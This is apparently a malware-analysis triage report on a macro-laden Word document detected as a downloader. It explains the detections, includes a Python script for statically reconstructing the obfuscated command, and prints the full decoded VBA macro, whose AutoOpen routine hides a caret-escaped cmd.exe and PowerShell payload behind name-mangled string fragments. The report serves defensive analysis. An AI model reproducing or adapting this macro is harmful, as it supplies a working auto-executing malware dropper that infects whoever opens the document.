Verdict: MALICIOUS
Risk score: 310 (10 heuristics matched)

Findings

- ClamAV: Doc.Downloader.Valyria-6665591-0 [critical, CLAMAV_DETECTION]
  ClamAV detected this file as malware: Doc.Downloader.Valyria-6665591-0.

- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]
  Document contains VBA macro code.

- WScript.Shell usage [critical, OLE_VBA_WSCRIPT]
  Matched lines in script (the body of AutoOpen):
    On Error Resume Next
    CreateObject("WScript.Shell").Run! ChrW(2 + 11 + 11 + 9 + 34) + HhzzUXUEW + ImAKLIoJU + SoUdsBtjIj + hQDPhYprIHi + JzZjoSYaz + uuNmL + jiIVXTiAp + IhXpISdiWD + qrXzXFZMsfihw, 545026675 - 545026675
    End Sub
  The "!" after Run is a VBA type-declaration suffix; it does not change the call, it only defeats signatures that look for ".Run " literally. ChrW(2 + 11 + 11 + 9 + 34) is ChrW(67), the "C" that begins the command, and the second argument, 545026675 - 545026675, is 0, the window style that starts the process hidden. Of the nine names concatenated after it, five are Functions defined in macros.bas (SoUdsBtjIj, hQDPhYprIHi, JzZjoSYaz, uuNmL, jiIVXTiAp); the other four are never assigned anywhere in the recovered source, so they evaluate to Empty and contribute nothing.

- CreateObject call [high, OLE_VBA_CREATEOBJ]
  Same matched lines as the WScript.Shell finding above (the Run statement in AutoOpen).

- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

- AutoOpen macro [low, OLE_VBA_AUTOOPEN]
  Matched lines in script:
    Sub AutoOpen()
    On Error Resume Next
  AutoOpen runs when the document is opened with macros enabled, so the Run statement above needs no further user interaction.

- Reference to Windows Script Host [high, SC_STR_WSCRIPT]
  Reference to Windows Script Host.

- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. In this sample a modern VBA project was in fact recovered (macros.bas, below), so the premise of this heuristic does not hold here and the finding duplicates the AutoOpen evidence rather than adding to it.

- Suspicious extracted artifact [medium, EXTRACTED_FILE_STATIC_TRIAGE]
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

- Embedded URL [info, EMBEDDED_URL]
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that Office writes into its own files; it is not contacted at runtime and is not an indicator.
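The Run line quoted in the findings above never spells out its command: a single ChrW() over summed constants supplies the first character, nine helper names supply the rest, and the window-style argument is a subtraction that yields 0. The Python below is added here as an example; it is not code from the report or from the sample. It rebuilds such a command statically by emulating only the VBA the macro uses, and its input is a constructed miniature of the macro (the identifiers and the payload fragment are made up). Run over the full preview text further down, the same code resolves the real concatenation chain.

```python
"""Reconstruct the command a VBA downloader hands to WScript.Shell.Run.

Added example, not part of the report or of the sample's own code. It
emulates only the VBA the macro actually uses: string literals joined with
'+', Chr()/ChrW() over integer arithmetic, Function return values, and names
that are never assigned. The module has no Option Explicit, so such names are
Variant Empty: 0 in arithmetic, "" in concatenation. Everything else
('VarType ...', 'IsArray ...', 'URcKdO = Sgn(5706)') is junk and is skipped.
"""
import re

# Constructed miniature with the sample's shape; identifiers and the payload
# fragment are made up for this example.
SAMPLE = r'''
Function PartOne()
On Error Resume Next
VarType Foo / Bar
a = "MD /V" + "^:^ /" + "c " + CStr(Chr(Qx + Zy + 34 + Rw))
URcKdO = Sgn(5706)
b = " s" + "e" + "T X=1"
PartOne = a + b
End Function
Sub AutoOpen()
On Error Resume Next
CreateObject("WScript.Shell").Run! ChrW(2 + 11 + 11 + 9 + 34) + Missing + PartOne, 545026675 - 545026675
End Sub
'''

ASSIGN_RE = re.compile(r'^([A-Za-z_]\w*)\s*=\s*(.+)$')
CHR_RE = re.compile(r'^(?:CStr\()?Chr[W$]?\((.+?)\)+$', re.I)
IDENT_RE = re.compile(r'^[A-Za-z_]\w*$')
# The '!' after Run is a VBA type-declaration suffix, hence optional here.
RUN_RE = re.compile(r'CreateObject\("WScript\.Shell"\)\.Run!?\s+(.+?),\s*([^,]+)$', re.I)
ARITH_OK = re.compile(r'^[\d\s+\-*/()]+$')


def eval_arith(expr):
    """Integer value of a VBA arithmetic expression; unassigned names are 0."""
    digits_only = re.sub(r'[A-Za-z_]\w*', '0', expr)
    if not ARITH_OK.match(digits_only):      # only digits and + - * / ( ) reach eval
        return None
    try:
        return int(eval(digits_only, {'__builtins__': {}}, {}))
    except (SyntaxError, ZeroDivisionError, OverflowError):
        return None


def split_plus(expr):
    """Split on '+' outside quotes and parentheses: VBA's '+' doubles as string
    concatenation, and the literals themselves contain '+' characters."""
    parts, cur, depth, quoted = [], [], 0, False
    for ch in expr:
        if ch == '"':
            quoted = not quoted
        elif not quoted:
            if ch == '(':
                depth += 1
            elif ch == ')':
                depth -= 1
            elif ch == '+' and depth == 0:
                parts.append(''.join(cur).strip())
                cur = []
                continue
        cur.append(ch)
    parts.append(''.join(cur).strip())
    return parts


def eval_string_expr(expr, env):
    """String value of a '+' chain, or None when a term is neither a literal,
    a Chr()/ChrW() call nor a bare name. That None is what drops the junk
    assignments: their right-hand sides never resolve to a string."""
    out = []
    for term in split_plus(expr):
        if len(term) >= 2 and term[0] == '"' and term[-1] == '"':
            out.append(term[1:-1].replace('""', '"'))    # VBA doubles quotes
        elif (m := CHR_RE.match(term)):
            code = eval_arith(m.group(1))
            if code is None:
                return None
            out.append(chr(code))
        elif IDENT_RE.match(term):
            out.append(env.get(term, ''))                 # Empty -> ""
        else:
            return None
    return ''.join(out)


def reconstruct(vba_source):
    """Walk the module top to bottom: each helper Function builds its fragments
    and assigns its own name before AutoOpen concatenates the names, so textual
    order reproduces the runtime value. Names live in one flat namespace, which
    is safe because the mangled identifiers are unique."""
    env, run_call = {}, None
    for raw in vba_source.splitlines():
        line = raw.strip()
        m = RUN_RE.search(line)
        if m:
            run_call = m.groups()
            continue
        m = ASSIGN_RE.match(line)
        if m:
            value = eval_string_expr(m.group(2), env)
            if value is not None:
                env[m.group(1)] = value
    if run_call is None:
        return {'command': None, 'window_style': None, 'env': env}
    return {
        'command': eval_string_expr(run_call[0], env),
        'window_style': eval_arith(run_call[1]),        # 0 = hidden window
        'env': env,
    }


if __name__ == '__main__':
    result = reconstruct(SAMPLE)
    print(repr(result['command']), 'window style', result['window_style'])
```

The output is the exact string cmd.exe would receive, carets and all; the caret layer is a separate problem, because it is cmd.exe, not VBA, that removes them.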
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10731 bytes |

SHA-256: 8002fa010589e59530efcbe9581fa53ecd2f9fa4fbe3833127296f55e55826d2

Detection (for macros.bas on its own)
ClamAV: No threats found. The Doc.Downloader.Valyria signature above matched the document container, not the decoded macro text.

Obfuscation or payload: likely
110 of 187 identifiers look randomly generated (e.g. 'ZMwlinQRdmpkhJ'); 4 string-concatenation chains, consistent with name-mangling obfuscation. In the preview, every Function body follows the same pattern: string fragments are assigned to throwaway names and joined in a final `Func = a + b + ...` line, while the surrounding `VarType ...`, `IsArray ...` and `URcKdO = ...` statements operate on variables that are never assigned and exist only as noise (under `On Error Resume Next` any failure they raise is swallowed). The fragments carry cmd.exe caret (^) escapes and assemble a command line that begins `CMD /V^:^ /c "`, builds variables with `set X=!Y:old=new!` substitutions (delayed expansion), and ends `&&CAll %nP37% "`. The `)`-laden fragments are the payload with placeholder characters that those substitutions later swap out; `Set it8=!NjTO:)=A!` in jiIVXTiAp, for instance, replaces every `)` with `A`.
Script preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "CCkPuPzirVT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "dAhzQwwVpDb"
Function SoUdsBtjIj()
On Error Resume Next
VarType iKwGV / HjElO + tXNHim - FtGmB
rjaFLORR = "MD /V" + "^:^ /" + "c " + " " + CStr(Chr(ZMwlinQRdmpkhJ + VBiqIDHaM + 34 + bVkwoPiB + qbQWwvbkzNjH)) + " s" + "e" + "T " + " ^ " + "^ M^Z" + "^d^=p^" + "5w^er^" + "]h^e^"
URcKdO = Sgn(5706)
IsArray WGJwYS * icYwE
VarType Log(uDfqv)
VarType 151 / ujLCLv
URcKdO = RoUZL / wbGTd
dsBVaCU = "ll^ _e " + "J)B^" + "X)$" + "/)^dw)" + "^9)G^4)" + "^Z/B^3"
URcKdO = Second(7)
VarType HbiKi / BtITz
IsArray Cos(aKLpb)
cQYOaXvoHir = ")C0" + ")+w^Bi" + ")^G5)" + "^Z/^B^" + "j)^H/)I"
VarType CDbl(59572 * OKJDb * ZPbIJG + fQNXXF)
VarType CDbl(EJvft * EZzWzz + 16276 / oAcpwS)
URcKdO = Month(44212360)
AjiCiWBiANP = ")BO)^" + "G" + "U)^" + "d))^u)$" + "c)^" + "Z/^B^i" + ")^Q" + "^M)+)" + "B^p)" + "^G^"
URcKdO = Fix(UhwIih + 74590)
VarType LCase(2626)
URcKdO = Tan(drudlC)
VarType Log(45986 + kLfwF)
VarType TypeName(54980 + fZthVj)
URcKdO = 54154 / GWowqH - McYvP / GqFYr
hdcjHb = "U)^+" + "^gB^" + "0){^]" + ")^J)B" + ",)" + "^Q^k)"
IsArray dGYXfT - UXQzh
IsArray VXdsFD / PGnrP
VarType Cos(379)
qkqVc = "^Z))^9" + ")Cc)^a)" + "^B0)H/)" + "c)" + ")^6)" + "C8" + ")Lw^B"
URcKdO = TypeName(36028 / CFcFW - 6459 + XiCZYT)
URcKdO = EoqmVY - bcvEP * zGjRCM + 129
IsArray 56636 + 56897
wcHUqYSV = "})" + "G^Q)a/^" + "B])C^" + "4" + ")aw" + "B^5)" + "^GQ" + ")+)^Bp)" + "^G^w" + ")cwB^0)" + "^HU)d)" + "^" + "Bv"
IsArray CByte(wcbDhV)
VarType Month(70756 - iomDbL)
QLzRfkGdFHX = ")^H" + "^I" + ")a/^B^" + "h)^Gw" + ")^" + "L" + "^g" + "B^j" + ")G8)" + "+"
VarType 15639 - QzWYA * 75762 / RDGsj
hnSsBYkOp = "/)v)^" + "G" + "^M)^+" + "^" + "w^B^" + "k){))V)" + "BR)^$" + "g)/)B" + "5)^" + "H/)^" + "d)^"
IsArray hAIPfh - rXsPpU
qrFJOaiVA = "B^" + "w){^5)L" + "w)v)^G" + "^4)Z/^" + "B" + "3)" + "^"
IsArray zjJMon / RBTHw + wBdcNi / fwQNhU
VarType FLmrf + EaQiE
URcKdO = 57506 + 79347 * jtDuKz / coaHw
KlVUjQa = "H^M" + ")^a/B0)" + "^GU)L" + "^g^B^p)" + "^HM)" + "Y" + "^w" + "^Bh)H" + ")" + ")c" + "))u)^GM" + ")+^w"
URcKdO = Tan(44)
IsArray Atn(1917)
IkAdfUJCV = "B})C8)e" + ")^B" + "))G^g)" + "d)B0)H)" + ")^Og)v)" + "C^8)Y^g" + "B^l)^" + "H/)" + "Y/)^,)C" + "4" + ")Y^gBp)" + "^H/"
IsArray 51406 + oSvuA
IsArray CStr(XSrjm)
tPYvtzFIkrw = ")+/" + "^Bp)G" + "M)cgBv" + ")C" + "4)Y" + "^" + "w^Bv)G" + "^0" + ")L^w),)" + "^Q" + "^M)/)B^"
SoUdsBtjIj = rjaFLORR + dsBVaCU + cQYOaXvoHir + AjiCiWBiANP + hdcjHb + qkqVc + wcHUqYSV + QLzRfkGdFHX + hnSsBYkOp + qrFJOaiVA + KlVUjQa + IkAdfUJCV + tPYvtzFIkrw
IsArray Int(mSdKq)
IsArray Tan(bLzuQ - GBSwfT / oTlvjY / jFicXj)
IsArray CVar(EjaTE)
IsArray 33207 / wUWPiw
End Function
Function hQDPhYprIHi()
On Error Resume Next
URcKdO = Int(11339 / XZVcUW - 68875 / uzlVL)
IsArray CByte(hjSSWh)
NMzVIjPrFvk = "5)^H" + "/)d)" + "Bw){^5" + ")^Lw" + ")v)HM" + ")^Y^wB^"
IsArray Rnd(940)
VarType CDate(kHARrN)
VarType Log(UdhVlJ - 96555 / ainUq - JIXASo)
VarType Log(79757010)
UzRnAvORu = "`)^Gk)+" + "/B^u)G" + "c)Z" + "/Bv)^H" + "I)Z^wB^" + "l)^H" + "U" + ")cwB" + "j)G^Q)^"
URcKdO = Atn(3109)
VarType Tan(336)
URcKdO = Atn(31)
IsArray WSQjz / 87241
ummhDmJBrwm = "d)^Bl)" + "HM)Yw^" + "B1)^" + "H/)^ZwB" + "j)" + "^G" + "^" + "Q)"
VarType CBool(WlVVL)
IsArray 62667 - wXULw
URcKdO = 44701 * mHwsuq
IsArray Val(251)
RYzTzBL = "cgB^i" + ")^HU)^+" + "^g" + "Bl)^H^M" + ")^d" + ")" + "^B^" + "p)C^4"
VarType Tan(69968 - 15915 - 34903 / Uzbbb)
QhJojv = ")cg^B" + "v)C8)^" + "+/)" + ",)" + "{c)^" + "M/"
URcKdO = Oct(KnIoP * kOiXZ * 70341 + 81226)
IsArray Log(6)
VarType PapfXQ - mApLwN
IsArray Sgn(519)
IsArray 29318 + KLDFi
OmdFYswO = "Bm)" + "^Qc)/)B" + "5)H" + "/" + ")^d" + ")B^w" + ")^{^" + "5)L^"
URcKdO = 75804 * XGksXi * MPRqAp * jzbZpP
MvzhiqUa = "w" + ")v)^G4" + ")Y/^B0" + ")^H" + "U)" + "cgB^l)^" + "G0)^+^" + "wB^u)^H" + "/"
IsArray Fix(dPQZLU)
IsArray Int(imkAL)
mziQVdUVv = ")LgB^," + ")^H^" + "U)" + "L^" + "wBI)Q" + "^])J" + "^w)^u)$" + "^M)c"
hQDPhYprIHi = NMzVIjPrFvk + UzRnAvORu + ummhDmJBrwm + RYzTzBL + QhJojv + OmdFYswO + MvzhiqUa + mziQVdUVv
VarType CByte(84)
IsArray LCase(56345 / vPnak * 29863 / Pwmjtz)
IsArray 66681 * bBYzj
URcKdO = Month(608)
URcKdO = SIzDl / DbwlI * 12157 + ajsGF
End Function
Function JzZjoSYaz()
On Error Resume Next
URcKdO = CDbl(4)
VarType Jswib / iFSAXs * cBvdM + wbNXo
URcKdO = 59168 + OjfcC
uVhcKpb = ")B^])^" + "G^k)d))" + "5" + ")C" + "c)/))`" + ")C^k)O" + "w)" + "k)^H" + "I)^a^" + "wB^L" + ")C))"
IsArray OqCwzd * WQOtv
URcKdO = uqtLJ + iZCuzm
URcKdO = 84714 + vnzEb
VarType LCase(jzSdr)
jAibHWUt = "P/)g" + ")" + "Cc)N/)" + "w)^{^" + "Y)Jw)^" + "7" + ")C/)^U" + ")Bv" + ")^" + "Hc)^P/)" + "^k)^GU" + ")^+"
URcKdO = 47341 - XGOpj / 50809 - niUAJn
IsArray 48568 + mZFZL - 67028 * 5607
URcKdO = 14512 + jElMJL
VarType Oct(96541 / zOUtJw)
DwZApYvzXHw = "gB^%){^" + "5)c)^" + "B^1)^G" + "I)+)" + "^Bp)^G" + "^M)"
VarType YTjWTP / tFHRsO * 74823 - MzSiMb
VarType Val(TuBiNS + zpzEaR)
vnBKfUnCT = "K" + "^w)`)^" + "$^w)" + "^Jw)" + "r)C/" + ")c^g" + "Br)Q" + "^])^"
URcKdO = Int(iJCdR + tLTzz)
VarType CDate(CZsXO)
IsArray 69828 / dKBiQb / llaUJ * vJMKzF
rQEitc = "Kw" + ")`)" + "C" + "4)^Z" + "/B4)G^U" + ")J^w)" + "^7)^" + "GY" + ")^+w" + "B,)GU)^" + "Y/^B^j)" + "G^g)K))"
VarType Oct(21766 + TANzU + 89882 / mwQis)
VarType CBool(201322132)
URcKdO = TimeValue(325)
WIbURfrjWi = "^k)" + "G" + "^0)S/^" + "B" + "^K)C)" + ")^a/^" + "B" + "^u)C"
IsArray 55446 - 96700
MiTjbbGAij = "))" + "J)^B," + ")" + "^Q" + "k)Z)" + ")" + "^p)^" + "H])d)" + "B" + ","
URcKdO = TimeValue(74824 * iSpak)
ivsNVDPsY = ")^H^k" + ")^e" + "w" + ")^k" + ")^$c)V" + ")^B3" + ")C^" + "4)R)^"
URcKdO = 4208 + 51510 - ZUHUwc * OnYCpj
OpvTzKDQzE = "B" + "v" + ")^Hc)^+" + "^g^B]" + ")G" + "^8)^Y/" + "B^k)^" + "QY)^a/^" + "B^])G^U" + ")^K))^k"
VarType 96183 + PlCoEd
VarType uKtJQ / 60887 - 89060 / FTDToL
BrOqrb = ")^G^0)S" + "/^B" + "K)C^w)" + "^I))^k)" + "^$))" + "+^w^B^3" + ")C" + "k)OwB"
VarType SOzpih - mYrQYo + 40281 / ozCRiE
URcKdO = CDbl(50)
VarType CDate(IAioai)
AwqINaizn = "^J" + ")G^4)^d" + "^g^Bv)^" + "G])^Z/" + ")" + "})^Qk)"
JzZjoSYaz = uVhcKpb + jAibHWUt + DwZApYvzXHw + vnBKfUnCT + rQEitc + WIbURfrjWi + MiTjbbGAij + ivsNVDPsY + OpvTzKDQzE + BrOqrb + AwqINaizn
URcKdO = Sin(225)
VarType CDate(WpoEsW)
VarType 1409 - OVfMdw * sodRR * MfpIjp
End Function
Function uuNmL()
On Error Resume Next
IsArray Round(fsnidT)
URcKdO = 81053 - mhiEij
OhaaiDT = "d)" + "^B^" + "l)G" + "^0)I)" + ")k)$))" + "+" + "wB" + "^3" + ")^{])^" + "Y"
URcKdO = CCur(wFvBq)
VarType 15425 + ZOPAwY
IsArray Log(384508999)
IsArray Val(81842 + 85086)
hEQAd = "^g^B" + ",)^G^U)" + "Y/Br)" + "{])^" + "f/B" + "^j" + ")^G^Q"
IsArray MVSuCB - RLFrC * 16998 * XrdCV
VarType 70730 - ciEMTP
pzdmAQRQ = ")d)B^" + "j)" + "^Gg)e" + "wB9)H" + "^0)I))" + "g)C" + "))I))g" + ")C))^I" + "))" + "g" + ")C" + "))"
URcKdO = iafmk * HnQZaU
URcKdO = hQDrJ + WIXwY + kqphCO + vIbdXn
CJKEs = "^I))" + "g)C))I" + "))g" + ")C))I))" + "g" + "))==" + "&& se"
VarType Round(FSKTr / WwPXu + 22733 + aDjNqs)
URcKdO = CDec(jWMppI)
WIEtOdzG = "^t " + "^ ^ ^O^" + "D" + "^G=^!^" + "M^Z^d:" + "%=2^!" + "&S^e^" + "t M9^P" + "^T="
VarType CDbl(61685 + vzHDE)
IsArray Atn(BJQKjS)
VarType CDate(4647)
URcKdO = THiYz * wVFRV
VarType Rnd(CSUtR)
VarType TimeValue(83)
jwMDsZmchKI = "!^O^D" + "^G" + "^:Q^=^" + "E!&" + " " + " S" + "^e^" + "t r^" + "Y=!^" + "M^" + "9^P^" + "T" + "^:^,^"
IsArray 43803 / sIoZwE - rrWiZ / pVHZsq
VarType 16274 * bAJDih * UFbLZ - BIvJM
HwsWzYabO = "=y!& s" + "^eT " + "^" + " " + "^" + "b^" + "XS" + "=!"
VarType Tan(HTjiV)
IsArray LCase(4227)
EPICJSmWE = "r^Y^:^}" + "^=^t^" + "!" + "&& " + " s^E" + "T ^ ^" + " ^ " + "^D^W" + "^Zs=^!^"
IsArray Sin(ppqDh / QsVjfW - GNJlU / diicEi)
IsArray CStr(43011 / AUUfQr)
IsArray 49202 + NTBvj
VarType Second(269621355)
RfGzV = "b^XS^:/" + "^" + "=^Q^" + "!& " + " " + "SE^t ^ "
IsArray CVar(742)
IsArray Rnd(NGqXH)
IsArray 21780 * 23733
VarType LCase(51)
URcKdO = LCase(MWZktL)
QNHiEjzFTI = "^ " + "^ ^ ^5" + "c=" + "^!" + "^D^" + "W^Z^s^" + ":^5"
uuNmL = OhaaiDT + hEQAd + pzdmAQRQ + CJKEs + WIEtOdzG + jwMDsZmchKI + HwsWzYabO + EPICJSmWE + RfGzV + QNHiEjzFTI
URcKdO = hVrakz * wSnIfz
VarType CDec(Dwdaq)
IsArray CDate(93893 / KwjGOo * jEuHJr + wzthzU)
End Function
Function jiIVXTiAp()
On Error Resume Next
URcKdO = Vllnb - pnckuh
VarType 7298 / PJZDDk
URcKdO = Int(cYzdj / CcCFp)
JmFTS = "^=o!&&s" + "E^t ^ N" + "j^T^O=" + "^!^5c^:" + "^" + "$^=^" + "F^!&&"
URcKdO = 55077 / RFPGf
IsArray 94566 / UwARnu / AWdRJ + dzIfZ
OfTqIizZThD = " S^e" + "t ^ " + "^i^" + "t8=!" + "Nj" + "^T^O:" + ")^=^A" + "^!&& " + " S^ET ^"
IsArray Val(9219)
IsArray Hex(86)
VarType Month(85437 + 45989 * IIwndL + fbchjr)
WJKjd = " V^" + "U^tL=" + "^!^i^t" + "8" + "^:`=n" + "!&" + "& " + " Se" + "^t" + " ^ ^ " + "^Dw^A" + "^8=^!V^" + "U^"
IsArray FShDTn - FHbGQE + jDcii * VNtRWd
IsArray ScnKZ / WWKTT
URcKdO = Int(56)
KzmGVRif = "t^L:^{=" + "^" + "D^!&&s^" + "eT " + "r^t=!" + "^Dw^A^" + "8" + "^:^]^" + "=^s^!&" + " se" + "t" + " ^ ^ "
IsArray 62702 / FiaGw + 58335 * NkzMr
VarType TimeValue(hpAmn)
URcKdO = 77945 + ruzJtI
kVDoi = "^ " + "d^a" + "=^!r^" + "t" + ":" + "^+^=" + "b^!" + "&& " + " s^e^t" + " ^ ^" + " n^P^"
URcKdO = Round(cjrLr)
aWwOidDPw = "3^7=^" + "!^d^a^" + ":^_=-!" + "&&CA^l" + "^l %" + "n^" + "P^3^7"
URcKdO = 8923 / 76371 * 46160 - acziwu
URcKdO = Log(57670 + iGBMK + fGmlvC * jkLhEp)
VarType 38883 + zGOUPw
PkqUUEBIfvn = "% " + " " + CStr(Chr(qqioWEYZJjovtp + DIPhiZOULH + 34 + OLaTulGzkpfWJ + jhBCmjcJY)) + ""
jiIVXTiAp = JmFTS + OfTqIizZThD + WJKjd + KzmGVRif + kVDoi + aWwOidDPw + PkqUUEBIfvn
URcKdO = Hex(ZmZWmw)
VarType CDate(WjoiWi)
IsArray 3441 * 9503 / ZRCcX + vNTPpw
URcKdO = 1181 - GuwpX
End Function
Attribute VB_Name = "XjbqHVjO"
Sub AutoOpen()
On Error Resume Next
CreateObject("WScript.Shell").Run! ChrW(2 + 11 + 11 + 9 + 34) + HhzzUXUEW + ImAKLIoJU + SoUdsBtjIj + hQDPhYprIHi + JzZjoSYaz + uuNmL + jiIVXTiAp + IhXpISdiWD + qrXzXFZMsfihw, 545026675 - 545026675
End Sub